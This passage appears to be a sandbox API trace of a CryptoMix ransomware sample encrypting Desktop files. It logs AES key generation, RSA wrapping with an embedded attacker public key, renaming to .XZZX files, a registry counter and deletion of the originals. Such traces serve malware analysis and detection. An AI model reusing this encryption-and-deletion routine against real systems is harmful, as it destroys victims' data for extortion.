halpmcxz\\desktop\\sdgi3.mp4")) returned 0 Thread: id = 564 os_tid = 0xc0 [0166.926] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.926] lstrcpyW (in: lpString1=0x29af460, lpString2="XaK4rq6FxAm.gif" | out: lpString1="XaK4rq6FxAm.gif") returned="XaK4rq6FxAm.gif" [0166.926] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.926] SetErrorMode (uMode=0x1) returned 0x1 [0166.926] lstrcpyW (in: lpString1=0x29af860, lpString2="XaK4rq6FxAm.gif" | out: lpString1="XaK4rq6FxAm.gif") returned="XaK4rq6FxAm.gif" [0166.926] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xd22cf61f, Data2=0x56d0, Data3=0x4909, Data4=([0]=0xa0, [1]=0xea, [2]=0x3b, [3]=0x58, [4]=0xc2, [5]=0xf1, [6]=0x6f, [7]=0xc9))) returned 0x0 [0166.926] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaK4rq6FxAm.gif") returned 57 [0166.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0166.926] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DF36633018C45D50D22CF61F1B5F4198.XZZX") returned 79 [0166.926] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="XZZX") returned 0x0 [0166.926] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaK4rq6FxAm.gif", dwFileAttributes=0x20) returned 1 [0166.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaK4rq6FxAm.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xak4rq6fxam.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x984 [0166.927] ReadFile (in: hFile=0x984, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x965c, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x965c, lpOverlapped=0x0) returned 1 [0166.927] CloseHandle (hObject=0x984) returned 1 [0166.927] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0166.927] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0166.927] SetErrorMode (uMode=0x1) returned 0x1 [0166.928] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0166.928] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2970) returned 1 [0166.929] CryptGenKey (in: hProv=0x3cc2970, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0167.050] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.050] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.050] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.050] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0167.050] CryptDestroyKey (hKey=0x43728b8) returned 1 [0167.050] CryptReleaseContext (hProv=0x3cc2970, dwFlags=0x0) returned 1 [0167.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DF36633018C45D50D22CF61F1B5F4198.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\df36633018c45d50d22cf61f1b5f4198.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x984 [0167.051] WriteFile (in: hFile=0x984, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x965c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x965c, lpOverlapped=0x0) returned 1 [0167.052] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x965c [0167.052] WriteFile (in: hFile=0x984, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.052] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9661 [0167.052] WriteFile (in: hFile=0x984, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x1e, lpOverlapped=0x0) returned 1 [0167.052] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x967f [0167.052] WriteFile (in: hFile=0x984, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.052] SetFilePointer (in: hFile=0x984, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9684 [0167.053] SetErrorMode (uMode=0x1) returned 0x1 [0167.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0167.053] OutputDebugStringW (lpOutputString="end") [0167.053] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.053] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0167.053] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2970) returned 1 [0167.054] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2970, dwCertEncodingType=0x1, pInfo=0x437f088*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f0b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f0c0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372b38) returned 1 [0167.054] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.054] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0167.054] CryptEncrypt (in: hKey=0x4372b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0167.054] CryptEncrypt (in: hKey=0x4372b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc29f8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc29f8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0167.054] WriteFile (in: hFile=0x984, lpBuffer=0x3cc29f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc29f8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0167.054] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0167.054] WriteFile (in: hFile=0x984, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.054] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0167.055] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0167.055] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x990) returned 0x0 [0167.055] RegQueryValueExW (in: hKey=0x990, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xef, lpcbData=0x29adfdc*=0x4) returned 0x0 [0167.055] RegCloseKey (hKey=0x990) returned 0x0 [0167.055] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x990) returned 0x0 [0167.055] RegSetValueExW (in: hKey=0x990, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf0, cbData=0x4 | out: lpData=0x29adfec*=0xf0) returned 0x0 [0167.055] RegCloseKey (hKey=0x990) returned 0x0 [0167.055] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.055] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.056] CloseHandle (hObject=0x984) returned 1 [0167.056] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0167.056] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0167.056] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaK4rq6FxAm.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xak4rq6fxam.gif")) returned 1 [0167.058] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XaK4rq6FxAm.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xak4rq6fxam.gif")) returned 0 Thread: id = 565 os_tid = 0xc4 [0167.082] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.082] lstrcpyW (in: lpString1=0x29af460, lpString2="xzzx_cryptMix.vir.exe" | out: lpString1="xzzx_cryptMix.vir.exe") returned="xzzx_cryptMix.vir.exe" [0167.082] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.083] SetErrorMode (uMode=0x1) returned 0x1 [0167.083] lstrcpyW (in: lpString1=0x29af860, lpString2="xzzx_cryptMix.vir.exe" | out: lpString1="xzzx_cryptMix.vir.exe") returned="xzzx_cryptMix.vir.exe" [0167.083] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x7edcd785, Data2=0x87ed, Data3=0x4b0e, Data4=([0]=0x9a, [1]=0x27, [2]=0xed, [3]=0xcf, [4]=0xc0, [5]=0x52, [6]=0x67, [7]=0x60))) returned 0x0 [0167.083] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe") returned 63 [0167.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0167.083] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E81AA92127D9DDF67EDCD7852A74C23E.XZZX") returned 79 [0167.083] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="XZZX") returned 0x0 [0167.083] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe", dwFileAttributes=0x20) returned 1 [0167.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0167.084] ReadFile (in: hFile=0x97c, lpBuffer=0x43d5378, nNumberOfBytesToRead=0x36800, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43d5378*, lpNumberOfBytesRead=0x29ae418*=0x36800, lpOverlapped=0x0) returned 1 [0167.086] CloseHandle (hObject=0x97c) returned 1 [0167.086] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0167.086] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0167.086] SetErrorMode (uMode=0x1) returned 0x1 [0167.086] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0167.086] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2a80) returned 1 [0167.089] CryptGenKey (in: hProv=0x3cc2a80, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0167.223] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.223] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0167.224] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.224] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0167.224] CryptDestroyKey (hKey=0x43728b8) returned 1 [0167.224] CryptReleaseContext (hProv=0x3cc2a80, dwFlags=0x0) returned 1 [0167.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E81AA92127D9DDF67EDCD7852A74C23E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e81aa92127d9ddf67edcd7852a74c23e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0167.225] WriteFile (in: hFile=0x97c, lpBuffer=0x43d5378*, nNumberOfBytesToWrite=0x36800, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43d5378*, lpNumberOfBytesWritten=0x29ae438*=0x36800, lpOverlapped=0x0) returned 1 [0167.228] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x36800 [0167.228] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.228] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x36805 [0167.228] WriteFile (in: hFile=0x97c, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2a, lpOverlapped=0x0) returned 1 [0167.228] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3682f [0167.228] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.228] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x36834 [0167.228] SetErrorMode (uMode=0x1) returned 0x1 [0167.228] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0167.228] OutputDebugStringW (lpOutputString="end") [0167.228] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.228] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0167.228] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2a80) returned 1 [0167.229] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2a80, dwCertEncodingType=0x1, pInfo=0x437f158*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f188*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f190*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372b78) returned 1 [0167.229] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0167.229] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0167.229] CryptEncrypt (in: hKey=0x4372b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0167.230] CryptEncrypt (in: hKey=0x4372b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2b08*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2b08*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0167.230] WriteFile (in: hFile=0x97c, lpBuffer=0x3cc2b08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2b08*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0167.230] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0167.230] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0167.230] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0167.230] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0167.230] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x994) returned 0x0 [0167.230] RegQueryValueExW (in: hKey=0x994, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf0, lpcbData=0x29adfdc*=0x4) returned 0x0 [0167.230] RegCloseKey (hKey=0x994) returned 0x0 [0167.230] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x994) returned 0x0 [0167.230] RegSetValueExW (in: hKey=0x994, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf1, cbData=0x4 | out: lpData=0x29adfec*=0xf1) returned 0x0 [0167.230] RegCloseKey (hKey=0x994) returned 0x0 [0167.230] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.231] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.231] CloseHandle (hObject=0x97c) returned 1 [0167.231] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0167.231] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0167.231] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 1 